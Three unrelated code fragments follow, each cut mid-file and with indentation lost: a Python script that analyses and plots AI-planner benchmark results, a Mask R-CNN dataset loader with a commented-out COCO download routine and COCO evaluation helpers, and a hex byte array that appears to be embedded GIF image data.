ordering_total_popf += float(popf_results[prob][12]) / float(popf_results[prob][11])
print("\nMean Relative Action: %f" % (action_total / float(len(mutual_solved))))
print("Mean Relative Ordering: %f" % (ordering_total / float(len(mutual_solved))))
print("POPF better / worse: %d / %d" % (popf_bet, ff_bet))
print("Mean Relative FF Action: %f" % (action_total_ff / float(len(mutual_solved))))
print("Mean Relative POPF Action: %f" % (action_total_popf / float(len(mutual_solved))))
print("Mean Relative FF Ordering: %f" % (ordering_total_ff / float(len(mutual_solved))))
print("Mean Relative POPF Ordering: %f" % (ordering_total_popf / float(len(mutual_solved))))
print("")
print("FF Solved: %d / %d" % (len(_solved_ff), len(set(["%s-%s" % (item[0], item[1]) for item in uncounted_ff]))))
print("POPF Solved: %d / %d" % (len(_solved_popf), len(set(["%s-%s" % (item[0], item[1]) for item in uncounted_popf]))))
print("Mutually Solved: %d" % len(mutual_solved))
print("")
def do_plotalltimes():
all_data = fetch_all_data()[1][0]
good_data = [x for x in all_data if GOOD == get_execution_status(x)]
kk_data = [x for x in [float(item[5]) for item in filter_settings(all_data, LCP)] if x <= 600]
md_data = [x for x in [float(item[7]) + float(item[6]) for item in filter_settings(good_data, MIN_DEORDERING)] if x <= 1801]
mr_data = [x for x in [float(item[7]) + float(item[6]) for item in filter_settings(good_data, MIN_REORDERING)] if x <= 1801]
lcp_data = [x for x in [float(item[7]) + float(item[6]) for item in filter_settings(good_data, LCP)] if x <= 1801]
print("Under 10: %d / %d" % (len([x for x in md_data + mr_data + lcp_data if x < 10]), len(md_data + mr_data + lcp_data)))
x1,y1 = create_time_profile(kk_data)
x2,y2 = create_time_profile(md_data)
x3,y3 = create_time_profile(mr_data)
x4,y4 = create_time_profile(lcp_data)
plot([x1,x2,x4,x3], [y1,y2,y4,y3], x_label = "Time (s)", y_label = "Problems Solved", no_scatter = True,
xyline = False, names = ['RX', 'MD', 'MCLCP', 'MR'], x_log = True, col = False)
def mip_vs_sat4j(sat4j_data, mip_data):
good_data = [x for x in sat4j_data if GOOD == get_execution_status(x)]
mr_data = [float(item[7]) + float(item[6]) for item in filter_settings(good_data, MIN_REORDERING)]
mip_data = [float(item[2]) + float(item[3]) for item in [x for x in mip_data if float(x[3]) > 0]]
x1,y1 = create_time_profile(mr_data)
x2,y2 = create_time_profile(mip_data)
#print len(x1)
#print len(x2)
print("x1 = %s" % str(x1))
print("y1 = %s" % str(y1))
print("x2 = %s" % str(x2))
print("y2 = %s" % str(y2))
print('plot([x1,x2], [y1,y2], x_label = "Time (s)", y_label = "Problems Solved", no_scatter = True, xyline = False, names = ["MR", "MIP"], x_log = True, col = False)')
for i in range(len(x1)):
print("MR,%f,%f" % (x1[i], y1[i]))
for i in range(len(x2)):
print("MIP,%f,%f" % (x2[i], y2[i]))
plot([x1,x2], [y1,y2], x_label = "Time (s)", y_label = "Problems Solved", no_scatter = True,
xyline = False, names = ['MR', 'MILP'], x_log = True, col = False)
def fetch_all_data():
all_counted_data = ([], [])
all_uncounted_data = ([], [])
for dom in GOOD_DOMAINS:
new_data = get_data(dom, True)
all_counted_data[0].extend(new_data[0])
all_counted_data[1].extend(new_data[1])
new_data = get_data(dom, False)
all_uncounted_data[0].extend(new_data[0])
all_uncounted_data[1].extend(new_data[1])
return all_counted_data, all_uncounted_data
if __name__ == '__main__':
import os
myargs, flags = get_opts()
if '-summary' in myargs:
if 'all' == myargs['-summary']:
all_counted_data, all_uncounted_data = fetch_all_data()
print("\n { FF }")
print_summary(all_counted_data[0], all_uncounted_data[0])
#print "\n\n { POPF }"
#print_summary(all_counted_data[1], all_uncounted_data[1])
else:
print("\n { FF }")
print_summary(get_data(myargs['-summary'], True)[0], get_data(myargs['-summary'], False)[0])
#print "\n\n { POPF }"
#print_summary(get_data(myargs['-summary'], True)[1], get_data(myargs['-summary'], False)[1])
elif '-lcpstats' in myargs:
if 'all' == myargs['-lcpstats']:
all_counted_data, all_uncounted_data = fetch_all_data()
print("\n { FF }")
lcp_stats(all_counted_data[0], all_uncounted_data[0])
print("\n\n { POPF }")
lcp_stats(all_counted_data[1], all_uncounted_data[1])
else:
print("\n { FF }")
lcp_stats(get_data(myargs['-lcpstats'], True)[0], get_data(myargs['-lcpstats'], False)[0])
print("\n\n { POPF }")
lcp_stats(get_data(myargs['-lcpstats'], True)[1], get_data(myargs['-lcpstats'], False)[1])
elif '-plotlcplinears' in myargs:
if 'all' == myargs['-plotlcplinears']:
all_counted_data, all_uncounted_data = fetch_all_data()
plot_relinears(all_counted_data[0], LCP, disable_ones = False)
else:
plot_relinears(get_data(myargs['-plotlcplinears'], True)[0], LCP, disable_ones = False)
elif '-plotlinears' in myargs:
if 'all' == myargs['-plotlinears']:
all_counted_data, all_uncounted_data = fetch_all_data()
plot_linears(all_counted_data[0])
else:
plot_linears(get_data(myargs['-plotlinears'], True)[0])
elif '-plottiming' in myargs:
if 'all' == myargs['-plottiming']:
all_counted_data, all_uncounted_data = fetch_all_data()
plot_timing(all_uncounted_data[0])
else:
plot_timing(get_data(myargs['-plottiming'], False)[0])
elif '-plotminrelinears' in myargs:
if 'all' == myargs['-plotminrelinears']:
all_counted_data, all_uncounted_data = fetch_all_data()
plot_relinears(all_counted_data[0], MIN_REORDERING)
else:
plot_relinears(get_data(myargs['-plotminrelinears'], True)[0], MIN_REORDERING)
elif '-timing' in myargs:
if 'all' == myargs['-timing']:
all_counted_data, all_uncounted_data = fetch_all_data()
compute_timing(all_uncounted_data[0])
else:
compute_timing(get_data(myargs['-timing'], False)[0])
elif '-meanactconst' in myargs:
if 'all' == myargs['-meanactconst']:
all_counted_data, all_uncounted_data = fetch_all_data()
compute_mean_act_const(all_uncounted_data[0])
else:
compute_mean_act_const(get_data(myargs['-meanactconst'], False)[0])
elif '-compareplanners' in myargs:
if 'all' == myargs['-compareplanners']:
all_counted_data, all_uncounted_data = fetch_all_data()
compare_planners(all_counted_data, all_uncounted_data)
else:
compare_planners(get_data(myargs['-compareplanners'], True), get_data(myargs['-compareplanners'], False))
elif '-maxsat' in myargs:
if 'all' == myargs['-maxsat']:
all_counted_data, all_uncounted_data = fetch_all_data()
maxsat_stats(all_uncounted_data[0])
else:
maxsat_stats(get_data(myargs['-maxsat'], False)[0])
elif '-mipvssat4j' in myargs:
if 'all' == myargs['-mipvssat4j']:
_, all_uncounted_data = fetch_all_data()
mip_vs_sat4j(all_uncounted_data[0], get_all_mip_data())
else:
mip_vs_sat4j(get_data(myargs['-mipvssat4j'], False)[0], get_mip_data(myargs['-mipvssat4j']))
| |
image.
Returns:
masks: A bool array of shape [height, width, instance count] with
one mask per instance.
class_ids: a 1D array of class IDs of the instance masks.
"""
# If not a balloon dataset image, delegate to parent class.
image_info = self.image_info[image_id]
if image_info["source"] != "PLC":
return super(self.__class__, self).load_mask(image_id)
name_id = image_info["class_id"]
print(name_id)
# Convert polygons to a bitmap mask of shape
# [height, width, instance_count]
info = self.image_info[image_id]
mask = np.zeros([info["height"], info["width"], len(info["polygons"])],
dtype=np.uint8)
class_ids = np.array(name_id, dtype=np.int32)
for i, p in enumerate(info["polygons"]):
# Get indexes of pixels inside the polygon and set them to 1
if 'all_points_y' in p.keys():
rr, cc = skimage.draw.polygon(p['all_points_y'], p['all_points_x'])
elif 'width' in p.keys():
rr, cc = skimage.draw.polygon([p['y'],p['y'],p['y']+p['height'],p['height']],[p['x'],p['x']+p['width'],p['x']+p['width'],p['x']])
mask[rr, cc, i] = 1
# print( mask.astype(np.bool), name_id)
# Return mask, and array of class IDs of each instance. Since we have
# one class ID only, we return an array of 1s
return (mask.astype(np.bool), class_ids)
def image_reference(self, image_id):
"""Return the path of the image."""
info = self.image_info[image_id]
if info["source"] == "PLC":
return info["path"]
else:
super(self.__class__, self).image_reference(image_id)
def train(model):
"""Train the model."""
# Training dataset.
dataset_train = PLCDataset()
# dataset_train.load_PLC_AutoLable(args['dataset'], "json_train2")
# dataset_train.load_PLC_AutoLable(args['dataset'], "json_train_carplate")
dataset_train.load_PLC_AutoLable(args['dataset'], "")
dataset_train.prepare()
# Validation dataset
dataset_val = PLCDataset()
# dataset_val.load_PLC(args['dataset'], "json_val")
# dataset_val.load_PLC_AutoLable(args['dataset'], "json_train_carplate")
dataset_val.load_PLC_AutoLable(args['dataset'], "")
dataset_val.prepare()
# *** This training schedule is an example. Update to your needs ***
# Since we're using a very small dataset, and starting from
# COCO trained weights, we don't need to train too long. Also,
# no need to train all layers, just the heads should do it.
print("Training network heads")
model.train(dataset_train, dataset_val,
learning_rate=config.LEARNING_RATE,
epochs=1000,
layers='all')
#
# ############################################################
# # Dataset
# ############################################################
#
# class PLCDataset(utils.Dataset):
# def load_coco(self, dataset_dir, subset, year=DEFAULT_DATASET_YEAR, class_ids=None,
# class_map=None, return_coco=False, auto_download=False):
# """Load a subset of the COCO dataset.
# dataset_dir: The root directory of the COCO dataset.
# subset: What to load (train, val, minival, valminusminival)
# year: What dataset year to load (2014, 2017) as a string, not an integer
# class_ids: If provided, only loads images that have the given classes.
# class_map: TODO: Not implemented yet. Supports maping classes from
# different datasets to the same class ID.
# return_coco: If True, returns the COCO object.
# auto_download: Automatically download and unzip MS-COCO images and annotations
# """
#
# if auto_download is True:
# self.auto_download(dataset_dir, subset, year)
#
# coco = COCO("{}/PLC_data/annotations/instances_{}.json".format(dataset_dir, subset))
# # coco = COCO(dataset_dir)
# if subset == "minival" or subset == "valminusminival":
# subset = "val"
# image_dir = "{}/{}".format(dataset_dir, subset)
#
# # Load all classes or a subset?
# if not class_ids:
# # All classes
# class_ids = sorted(coco.getCatIds())
#
# # All images or a subset?
# if class_ids:
# image_ids = []
# for id in class_ids:
# image_ids.extend(list(coco.getImgIds(catIds=[id])))
# # Remove duplicates
# image_ids = list(set(image_ids))
# else:
# # All images
# image_ids = list(coco.imgs.keys())
#
# # Add classes
# for i in class_ids:
# self.add_class("coco", i, coco.loadCats(i)[0]["name"])
#
# # Add images
# for i in image_ids:
# self.add_image(
# "coco", image_id=i,
# path=os.path.join(image_dir, coco.imgs[i]['file_name']),
# width=coco.imgs[i]["width"],
# height=coco.imgs[i]["height"],
# annotations=coco.loadAnns(coco.getAnnIds(
# imgIds=[i], catIds=class_ids, iscrowd=None)))
# if return_coco:
# return coco
#
# def auto_download(self, dataDir, dataType, dataYear):
# """Download the COCO dataset/annotations if requested.
# dataDir: The root directory of the COCO dataset.
# dataType: What to load (train, val, minival, valminusminival)
# dataYear: What dataset year to load (2014, 2017) as a string, not an integer
# Note:
# For 2014, use "train", "val", "minival", or "valminusminival"
# For 2017, only "train" and "val" annotations are available
# """
#
# # Setup paths and file names
# if dataType == "minival" or dataType == "valminusminival":
# imgDir = "{}/{}{}".format(dataDir, "val", dataYear)
# imgZipFile = "{}/{}{}.zip".format(dataDir, "val", dataYear)
# imgURL = "http://images.cocodataset.org/zips/{}{}.zip".format("val", dataYear)
# else:
# imgDir = "{}/{}{}".format(dataDir, dataType, dataYear)
# imgZipFile = "{}/{}{}.zip".format(dataDir, dataType, dataYear)
# imgURL = "http://images.cocodataset.org/zips/{}{}.zip".format(dataType, dataYear)
# # print("Image paths:"); print(imgDir); print(imgZipFile); print(imgURL)
#
# # Create main folder if it doesn't exist yet
# if not os.path.exists(dataDir):
# os.makedirs(dataDir)
#
# # Download images if not available locally
# if not os.path.exists(imgDir):
# os.makedirs(imgDir)
# print("Downloading images to " + imgZipFile + " ...")
# with urllib.request.urlopen(imgURL) as resp, open(imgZipFile, 'wb') as out:
# shutil.copyfileobj(resp, out)
# print("... done downloading.")
# print("Unzipping " + imgZipFile)
# with zipfile.ZipFile(imgZipFile, "r") as zip_ref:
# zip_ref.extractall(dataDir)
# print("... done unzipping")
# print("Will use images in " + imgDir)
#
# # Setup annotations data paths
# annDir = "{}/annotations".format(dataDir)
# if dataType == "minival":
# annZipFile = "{}/instances_minival2014.json.zip".format(dataDir)
# annFile = "{}/instances_minival2014.json".format(annDir)
# annURL = "https://dl.dropboxusercontent.com/s/o43o90bna78omob/instances_minival2014.json.zip?dl=0"
# unZipDir = annDir
# elif dataType == "valminusminival":
# annZipFile = "{}/instances_valminusminival2014.json.zip".format(dataDir)
# annFile = "{}/instances_valminusminival2014.json".format(annDir)
# annURL = "https://dl.dropboxusercontent.com/s/s3tw5zcg7395368/instances_valminusminival2014.json.zip?dl=0"
# unZipDir = annDir
# else:
# annZipFile = "{}/annotations_trainval{}.zip".format(dataDir, dataYear)
# annFile = "{}/instances_{}{}.json".format(annDir, dataType, dataYear)
# annURL = "http://images.cocodataset.org/annotations/annotations_trainval{}.zip".format(dataYear)
# unZipDir = dataDir
# # print("Annotations paths:"); print(annDir); print(annFile); print(annZipFile); print(annURL)
#
# # Download annotations if not available locally
# if not os.path.exists(annDir):
# os.makedirs(annDir)
# if not os.path.exists(annFile):
# if not os.path.exists(annZipFile):
# print("Downloading zipped annotations to " + annZipFile + " ...")
# with urllib.request.urlopen(annURL) as resp, open(annZipFile, 'wb') as out:
# shutil.copyfileobj(resp, out)
# print("... done downloading.")
# print("Unzipping " + annZipFile)
# with zipfile.ZipFile(annZipFile, "r") as zip_ref:
# zip_ref.extractall(unZipDir)
# print("... done unzipping")
# print("Will use annotations in " + annFile)
#
# def load_mask(self, image_id):
# """Load instance masks for the given image.
#
# Different datasets use different ways to store masks. This
# function converts the different mask format to one format
# in the form of a bitmap [height, width, instances].
#
# Returns:
# masks: A bool array of shape [height, width, instance count] with
# one mask per instance.
# class_ids: a 1D array of class IDs of the instance masks.
# """
# # If not a COCO image, delegate to parent class.
# image_info = self.image_info[image_id]
# if image_info["source"] != "coco":
# return super(CocoDataset, self).load_mask(image_id)
#
# instance_masks = []
# class_ids = []
# annotations = self.image_info[image_id]["annotations"]
# # Build mask of shape [height, width, instance_count] and list
# # of class IDs that correspond to each channel of the mask.
# for annotation in annotations:
# class_id = self.map_source_class_id(
# "coco.{}".format(annotation['category_id']))
# if class_id:
# m = self.annToMask(annotation, image_info["height"],
# image_info["width"])
# # Some objects are so small that they're less than 1 pixel area
# # and end up rounded out. Skip those objects.
# if m.max() < 1:
# continue
# # Is it a crowd? If so, use a negative class ID.
# if annotation['iscrowd']:
# # Use negative class ID for crowds
# class_id *= -1
# # For crowd masks, annToMask() sometimes returns a mask
# # smaller than the given dimensions. If so, resize it.
# if m.shape[0] != image_info["height"] or m.shape[1] != image_info["width"]:
# m = np.ones([image_info["height"], image_info["width"]], dtype=bool)
# instance_masks.append(m)
# class_ids.append(class_id)
#
# # Pack instance masks into an array
# if class_ids:
# mask = np.stack(instance_masks, axis=2).astype(np.bool)
# class_ids = np.array(class_ids, dtype=np.int32)
# return mask, class_ids
# else:
# # Call super class to return an empty mask
# return super(CocoDataset, self).load_mask(image_id)
#
# def image_reference(self, image_id):
# """Return a link to the image in the COCO Website."""
# info = self.image_info[image_id]
# if info["source"] == "coco":
# return "http://cocodataset.org/#explore?id={}".format(info["id"])
# else:
# super(CocoDataset, self).image_reference(image_id)
#
# # The following two functions are from pycocotools with a few changes.
#
# def annToRLE(self, ann, height, width):
# """
# Convert annotation which can be polygons, uncompressed RLE to RLE.
# :return: binary mask (numpy 2D array)
# """
# segm = ann['segmentation']
# if isinstance(segm, list):
# # polygon -- a single object might consist of multiple parts
# # we merge all parts into one mask rle code
# rles = maskUtils.frPyObjects(segm, height, width)
# rle = maskUtils.merge(rles)
# elif isinstance(segm['counts'], list):
# # uncompressed RLE
# rle = maskUtils.frPyObjects(segm, height, width)
# else:
# # rle
# rle = ann['segmentation']
# return rle
#
# def annToMask(self, ann, height, width):
# """
# Convert annotation which can be polygons, uncompressed RLE, or RLE to binary mask.
# :return: binary mask (numpy 2D array)
# """
# rle = self.annToRLE(ann, height, width)
# m = maskUtils.decode(rle)
# return m
############################################################
# COCO Evaluation
############################################################
def build_coco_results(dataset, image_ids, rois, class_ids, scores, masks):
"""Arrange resutls to match COCO specs in http://cocodataset.org/#format
"""
# If no results, return an empty list
if rois is None:
return []
results = []
for image_id in image_ids:
# Loop through detections
for i in range(rois.shape[0]):
class_id = class_ids[i]
score = scores[i]
bbox = np.around(rois[i], 1)
mask = masks[:, :, i]
result = {
"image_id": image_id,
"category_id": dataset.get_source_class_id(class_id, "coco"),
"bbox": [bbox[1], bbox[0], bbox[3] - bbox[1], bbox[2] - bbox[0]],
"score": score,
"segmentation": maskUtils.encode(np.asfortranarray(mask))
}
results.append(result)
return results
pannel_index=0
total_count=1
pcl_container=[]
import math
#注意 这里采用了非极大值抑制 后续取消
all_labels=["SM 1234","SM 1231","SM 1223"]
def display_mask_image(cv_window_name,image, boxes, masks, class_ids, class_names,
scores=None, title="PLC",
figsize=(16, 16), ax=None,
show_mask=True, show_bbox=True,
colors=None, captions=None,
score_threshold=0.8,show_score=True,Traceing_threshold=150):
"""
boxes: [num_instance, (y1, x1, y2, x2, class_id)] in | |
0x79, 0x39, 0x46,
0xd1, 0x6c, 0xa8, 0xa8, 0x30, 0x2e, 0x82, 0x99, 0x50, 0x46, 0x7d, 0x93, 0x35, 0xe5, 0xc9, 0x9f,
0x53, 0x92, 0x8d, 0x9d, 0x52, 0x18, 0x6c, 0x87, 0x2e, 0x84, 0xd1, 0xfe, 0xb5, 0x91, 0x37, 0xed,
0xc2, 0x10, 0x65, 0xd2, 0x26, 0x74, 0xbb, 0xf2, 0x32, 0xda, 0x02, 0x8d, 0x15, 0xef, 0x61, 0x0c,
0xf9, 0xc0, 0x26, 0x84, 0xa2, 0x47, 0xbf, 0xec, 0xbc, 0xfa, 0xc6, 0x3e, 0x10, 0xfd, 0x38, 0x3f,
0x02, 0xd1, 0x86, 0x73, 0x14, 0x10, 0xbd, 0x38, 0x58, 0xff, 0xf3, 0xc6, 0x61, 0x1b, 0x2c, 0xd5,
0xbf, 0x94, 0x21, 0x58, 0x26, 0x92, 0xf5, 0x01, 0x5f, 0xce, 0x08, 0x3c, 0x13, 0xa9, 0xe1, 0x7b,
0x1d, 0x41, 0x82, 0xfc, 0x78, 0xcf, 0xbf, 0xbf, 0xff, 0x82, 0x26, 0xfc, 0x81, 0x85, 0x0e, 0x3f,
0x68, 0x37, 0x00, 0x76, 0x03, 0x08, 0xa1, 0xe0, 0x82, 0x0a, 0x0a, 0x84, 0xa0, 0x1f, 0x3f, 0xe8,
0x80, 0xc5, 0x1f, 0x26, 0x0c, 0x80, 0x45, 0x1f, 0x42, 0x0c, 0xe4, 0x43, 0x12, 0x03, 0x78, 0xc1,
0x07, 0x1f, 0x10, 0x7d, 0x28, 0x5e, 0x12, 0x3e, 0x0c, 0x24, 0x44, 0x1f, 0x3a, 0xfc, 0x37, 0x50,
0x40, 0x00, 0x21, 0xf9, 0x04, 0x05, 0x03, 0x00, 0x03, 0x00, 0x2c, 0x0d, 0x00, 0x18, 0x00, 0x22,
0x00, 0x2b, 0x00, 0x00, 0x08, 0xff, 0x00, 0x07, 0x08, 0x1c, 0x48, 0x70, 0xa0, 0x30, 0x67, 0x82,
0x94, 0x08, 0x72, 0xb6, 0xac, 0xa0, 0xc3, 0x87, 0x0f, 0x9d, 0x21, 0x52, 0xd1, 0xa2, 0xa2, 0x45,
0x60, 0xce, 0x00, 0x40, 0xdc, 0x68, 0x30, 0x8a, 0x45, 0x17, 0x5c, 0xb8, 0x08, 0xb4, 0x48, 0xa4,
0x21, 0xc7, 0x87, 0x84, 0xb8, 0x54, 0x64, 0x32, 0xa4, 0x49, 0x80, 0x21, 0x04, 0x2b, 0xae, 0x68,
0x76, 0xb2, 0xa0, 0x30, 0x95, 0x2a, 0x04, 0x4d, 0xb1, 0x52, 0x88, 0x89, 0x0b, 0x87, 0x2d, 0x5c,
0xd0, 0xac, 0x39, 0x60, 0x11, 0x91, 0x16, 0x03, 0x96, 0x4c, 0x79, 0x62, 0x11, 0x29, 0x50, 0x2e,
0xc1, 0x88, 0x1a, 0x73, 0x3a, 0xc4, 0x49, 0xc5, 0x93, 0x2d, 0x0e, 0xd5, 0x0c, 0x56, 0x23, 0xe8,
0x8a, 0xab, 0x35, 0x5b, 0xd4, 0x68, 0x72, 0xd2, 0x19, 0xd2, 0x25, 0x45, 0x88, 0x0e, 0x6c, 0xe1,
0xec, 0xe4, 0x30, 0xa4, 0x86, 0x3c, 0xaa, 0x1d, 0xd0, 0x62, 0xd8, 0x49, 0x28, 0x48, 0xc1, 0xce,
0x05, 0xc6, 0x11, 0x40, 0x8d, 0xb9, 0x0e, 0xa1, 0xf4, 0xfd, 0x0b, 0x98, 0xa0, 0x60, 0x8e, 0x89,
0x0a, 0x13, 0x44, 0xe4, 0x56, 0xf1, 0x40, 0xad, 0x1c, 0xcd, 0x3a, 0x6e, 0x91, 0x96, 0x63, 0xb0,
0xc3, 0x85, 0xb9, 0x68, 0x3c, 0xb9, 0x44, 0x31, 0x5b, 0xa2, 0x00, 0x18, 0x03, 0x8e, 0xe2, 0xb8,
0x74, 0xcd, 0x15, 0x6a, 0x85, 0x29, 0x96, 0x6c, 0xfa, 0x24, 0x69, 0x8e, 0x76, 0x4b, 0x37, 0x73,
0xfa, 0x50, 0x05, 0x21, 0xd3, 0x00, 0x30, 0x3b, 0xe4, 0xdb, 0x1a, 0xf2, 0x43, 0xdf, 0xa5, 0x59,
0x17, 0xa4, 0xdc, 0x5a, 0xe0, 0xa1, 0x1e, 0x0e, 0x81, 0x17, 0x17, 0xc6, 0x9c, 0x79, 0xd4, 0xe2,
0xd0, 0x6b, 0x02, 0x01, 0x43, 0xbd, 0x3a, 0x75, 0x20, 0xd0, 0xbb, 0x40, 0x8c, 0x04, 0xfd, 0x05,
0x44, 0x30, 0xd0, 0x51, 0xb0, 0x65, 0x71, 0xc8, 0xc6, 0x4b, 0xf4, 0x3b, 0x0e, 0xe9, 0x6c, 0x2e,
0xae, 0xa3, 0x4e, 0x19, 0x81, 0x65, 0xe6, 0xf8, 0x89, 0x2e, 0xb0, 0x84, 0x8d, 0x31, 0x63, 0x8e,
0x98, 0xa0, 0xcf, 0xbf, 0xbf, 0xff, 0x87, 0x25, 0x64, 0x81, 0x85, 0x0e, 0x3f, 0xcc, 0xd7, 0x47,
0x1f, 0x03, 0x08, 0x21, 0xc4, 0x00, 0x27, 0x34, 0xe8, 0x60, 0x82, 0x0b, 0x1e, 0x38, 0x80, 0x1f,
0x3f, 0xe8, 0x80, 0x45, 0x16, 0x25, 0x0c, 0x90, 0x85, 0x1f, 0x42, 0x9c, 0x00, 0x04, 0x0a, 0x3e,
0x24, 0xe1, 0x05, 0x1f, 0x7c, 0xd4, 0x44, 0xa2, 0x17, 0x49, 0xf8, 0x80, 0x02, 0x10, 0x27, 0x08,
0xe1, 0x47, 0x16, 0xa0, 0x01, 0x20, 0xe3, 0x8c, 0x6a, 0x05, 0x04, 0x00, 0x21, 0xf9, 0x04, 0x05,
0x04, 0x00, 0x03, 0x00, 0x2c, 0x0c, 0x00, 0x17, 0x00, 0x24, 0x00, 0x2c, 0x00, 0x00, 0x08, 0xff,
0x00, 0x07, 0x08, 0x1c, 0x48, 0x90, 0xe0, 0x32, 0x67, 0x82, 0x12, 0x3a, 0x5b, 0x56, 0xb0, 0xa1,
0xc3, 0x87, 0x00, 0x9c, 0x21, 0x6a, 0x41, 0xb1, 0xa2, 0x0a, 0x60, 0x43, 0x16, 0x3d, 0xdc, 0x58,
0x70, 0xd9, 0x44, 0x8a, 0x03, 0x5c, 0xb8, 0x18, 0x48, 0x91, 0x49, 0x33, 0x8e, 0x1c, 0x9b, 0xad,
0x68, 0x31, 0x80, 0xc9, 0x12, 0x2a, 0x53, 0x86, 0x14, 0x6c, 0xd1, 0xc3, 0x19, 0x4a, 0x87, 0xcd,
0x5c, 0xb4, 0x70, 0xa1, 0x64, 0x0a, 0x15, 0x41, 0x51, 0xb8, 0x34, 0x6c, 0xa1, 0xc2, 0xe6, 0xcd,
0x81, 0xc2, 0x56, 0xba, 0x90, 0x32, 0xa5, 0x90, 0x4e, 0x90, 0x43, 0x6b, 0x30, 0x3c, 0x3a, 0x20,
0x0a, 0x4b, 0x2e, 0x54, 0x9c, 0xb0, 0x44, 0xd9, 0x02, 0x11, 0xd5, 0x66, 0x5b, 0x07, 0x40, 0xbd,
0xd9, 0xe2, 0xe4, 0xcd, 0x61, 0x2c, 0xa5, 0x14, 0xa2, 0x2a, 0xb0, 0xc5, 0xb0, 0x9b, 0xc1, 0x6a,
0x08, 0x2c, 0xe2, 0x84, 0xad, 0xc0, 0x1a, 0x00, 0x50, 0x82, 0x6d, 0x1b, 0x96, 0xaa, 0x0b, 0x61,
0x28, 0x9d, 0xf5, 0xb5, 0x2b, 0xd6, 0xec, 0xc6, 0x63, 0x83, 0xed, 0xaa, 0x30, 0xec, 0x90, 0x02,
0xbe, 0xc4, 0x6c, 0x55, 0x10, 0x42, 0xb9, 0x4c, 0x05, 0x61, 0x82, 0x2e, 0x9a, 0xa0, 0x04, 0x00,
0xe5, 0xf2, 0x40, 0x60, 0x47, 0x0f, 0x79, 0x16, 0xb8, 0xe4, 0xe8, 0xb2, 0x1e, 0x9e, 0x6b, 0x68,
0x0e, 0xed, 0xd9, 0x18, 0xdb, 0x60, 0x44, 0x08, 0x23, 0xca, 0x6b, 0x97, 0x09, 0xdb, 0xd8, 0xa9,
0x47, 0xeb, 0x76, 0xd8, 0xc2, 0xa8, 0x67, 0x00, 0xa0, 0x39, 0x46, 0xd9, 0x3d, 0xc0, 0x37, 0x6f,
0xc6, 0x9e, 0x9b, 0xa0, 0x7e, 0x88, 0x97, 0xf8, 0x00, 0xaf, 0x0f, 0x7f, 0x39, 0x1f, 0xe0, 0xfa,
0xa1, 0x71, 0xdd, 0x8b, 0xde, 0x4e, 0xe7, 0x18, 0xac, 0x89, 0x77, 0xef, 0x1a, 0xb7, 0x8b, 0x78,
0xe7, 0x98, 0x64, 0x87, 0xf9, 0xf3, 0xe6, 0x93, 0x6c, 0xdf, 0xd3, 0xa6, 0xbd, 0xfb, 0xf6, 0x61,
0xb6, 0x77, 0x79, 0xff, 0x5e, 0xcc, 0xf6, 0x17, 0xf4, 0xdd, 0x83, 0xd9, 0x8e, 0x65, 0x4d, 0xc3,
0x34, 0x3f, 0x88, 0xe7, 0x45, 0x1a, 0x04, 0xa1, 0x11, 0xc4, 0x78, 0x03, 0xf4, 0x31, 0xc6, 0x1c,
0x72, 0x88, 0x21, 0x04, 0x82, 0x10, 0x46, 0x28, 0xa1, 0x40, 0x00, 0x64, 0xf1, 0x87, 0x0e, 0x3f,
0xf8, 0x91, 0xe0, 0x00, 0x42, 0x3c, 0x78, 0xc2, 0x09, 0x0d, 0x7d, 0xc8, 0xe1, 0x83, 0x7d, 0x0c,
0x80, 0x4b, 0x80, 0x7f, 0x64, 0x41, 0xdb, 0x0f, 0x7d, 0x9c, 0x00, 0x04, 0x0a, 0x3e, 0x24, 0xe1,
0x05, 0x1f, 0x76, 0xf1, 0xe1, 0x45, 0x12, 0x3e, 0xa0, 0x00, 0xc4, 0x09, 0x7d, 0x04, 0x78, 0x13,
0x00, 0xb4, 0x15, 0x04, 0xe4, 0x51, 0x01, 0x01, 0x00, 0x21, 0xf9, 0x04, 0x05, 0x06, 0x00, 0x07,
0x00, 0x2c, 0x0c, 0x00, 0x16, 0x00, 0x24, 0x00, 0x2d, 0x00, 0x00, 0x08, 0xff, 0x00, 0x0f, 0x08,
0x1c, 0x48, 0xb0, 0xa0, 0x40, 0x00, 0x06, 0x13, 0x2a, 0x5c, 0x78, 0xa0, 0xd9, 0x21, 0x44, 0x30,
0x54, 0xc0, 0x40, 0x74, 0xa8, 0x19, 0xc3, 0x8b, 0x04, 0x9b, 0x21, 0x6a, 0x61, 0xb0, 0x45, 0x0b,
0x60, 0xce, 0x30, 0x2e, 0x04, 0x70, 0x48, 0x85, 0x40, 0x17, 0x4e, 0x94, 0x38, 0x29, 0xd8, 0x62,
0x58, 0x30, 0x91, 0x05, 0x17, 0xfd, 0xe2, 0xb8, 0x42, 0x50, 0x93, 0x00, 0xc2, 0x94, 0x74, 0x44,
0xd4, 0x04, 0xe6, 0xc0, 0x99, 0x07, 0x88, 0x50, 0xa9, 0x22, 0x88, 0x89, 0xc7, 0x84, 0x2d, 0x10,
0x21, 0x84, 0xc9, 0x88, 0x23, 0x93, 0x26, 0x56, 0xb8, 0x70, 0x64, 0xd8, 0xc2, 0x18, 0x4c, 0x61,
0x35, 0x06, 0x2e, 0x59, 0x01, 0xb3, 0x86, 0x30, 0x91, 0x87, 0x04, 0x32, 0x71, 0xe1, 0x53, 0x60,
0xd8, 0x8b, 0x8b, 0xa0, 0x1c, 0x70, 0x51, 0xe5, 0x49, 0xd9, 0x03, 0x50, 0x96, 0x2e, 0x6c, 0xc6,
0xd1, 0x85, 0x20, 0xae, 0x65, 0x55, 0x2c, 0xbb, 0x38, 0xe4, 0x2d, 0xcb, 0x90, 0x0c, 0xad, 0xfa,
0x25, 0x08, 0x58, 0x21, 0x00, 0xc1, 0x83, 0x0f, 0xb4, 0x28, 0x9c, 0x90, 0x44, 0xe2, 0x81, 0x8b,
0x2f, 0xd2, 0x7d, 0xac, 0xf7, 0x62, 0xb0, 0xac, 0x89, 0xe3, 0x62, 0x1c, 0xf6, 0xf8, 0xac, 0x64,
0x93, 0x83, 0xbf, 0x8a, 0xe4, 0xfc, 0xb8, 0xb4, 0x69, 0xd3, 0x2f, 0x4f, 0xab, 0x2e, 0xc8, 0x68,
0x35, 0x43, 0x26, 0x17, 0x11, 0x99, 0x5e, 0x72, 0x91, 0x71, 0x68, 0xd0, 0x0a, 0x53, 0x97, 0x4e,
0xb4, 0x50, 0xf6, 0x69, 0xcf, 0x06, 0x5b, 0xaf, 0x26, 0x4b, 0x30, 0xab, 0xdc, 0xd3, 0x8b, 0x82,
